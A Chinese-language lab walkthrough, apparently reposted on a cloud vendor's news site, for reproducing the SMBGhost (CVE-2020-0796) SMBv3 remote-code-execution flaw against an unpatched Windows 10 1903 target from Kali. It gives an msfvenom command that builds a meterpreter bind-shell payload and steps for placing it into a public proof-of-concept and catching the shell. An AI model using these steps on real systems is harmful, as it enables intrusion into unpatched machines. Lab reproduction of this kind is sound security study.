您好,登錄后才能下訂單哦!
本篇文章給大家分享的是有關CVE-2020-0796漏洞該怎么進行復現,小編覺得挺實用的,因此分享給大家學習,希望大家閱讀完這篇文章后可以有所收獲,話不多說,跟著小編一起來看看吧。
Microsoft服務器消息塊(SMB)協議是Microsoft Windows中使用的一項Microsoft網絡文件共享協議。在大部分windows系統中都是默認開啟的,用于在計算機間共享文件、打印機等。Windows 10和Windows Server 2016引入了SMB 3.1.1 。本次漏洞源于SMBv3沒有正確處理壓縮的數據包,在解壓數據包的時候使用客戶端傳過來的長度進行解壓時,并沒有檢查長度是否合法,最終導致整數溢出。利用該漏洞,黑客可直接遠程攻擊SMB服務端遠程執行任意惡意代碼,亦可通過構建惡意SMB服務端誘導客戶端連接從而大規模攻擊客戶端。
Windows 10 Version 1903 for 32-bit SystemsWindows 10 Version 1903 for x64-based SystemsWindows 10 Version 1903 for ARM64-based SystemsWindows Server, Version 1903 (Server Core installation)Windows 10 Version 1909 for 32-bit SystemsWindows 10 Version 1909 for x64-based SystemsWindows 10 Version 1909 for ARM64-based SystemsWindows Server, Version 1909 (Server Core installation)
Kali系統 ip:172.16.0.27
被攻擊機win10系統ip:172.16.0.29受此次漏洞影響的win10系統,并安裝帶python3.6.x,我這邊用的是(復制下方鏈接可下載)ed2k://|file|cn_windows_10_business_editions_version_1903_updated_sept_2019_x64_dvd_2f5281e1.iso|5231140864|B1D5C水4C印401036B0B1EBA64476A95F338|/ (去掉其中的水印二字)
ps:關閉defender防火墻
1、查看環境情況Windows版本,按win+r,在彈出窗口中輸入
查看版本信息
2、使用工具檢測靶機是否存在漏洞,檢測工具下載地址https://github.com/ollypwn/SMBGhost運行結果如下圖,證明靶機存在此漏洞
3、kali使用msf生成木馬,并查看是否生成功msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python>exploit
4、下載poc,將生成的exploit.py 生成的code,替換到exploit.py的USER_PAYLOAD參數,并把參數buf改為USER_PAYLOAD。
5、運行poc:python3.6 exploit.py -ip xx.xx.xx.xx (如果出現報錯physical read primitive failed! 多運行幾次)
6、啟動msf監聽本地端口,獲得靶機權限,攻擊成功(run失敗就多run幾次)
以上就是CVE-2020-0796漏洞該怎么進行復現,小編相信有部分知識點可能是我們日常工作會見到或用到的。希望你能通過這篇文章學到更多知識。更多詳情敬請關注億速云行業資訊頻道。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。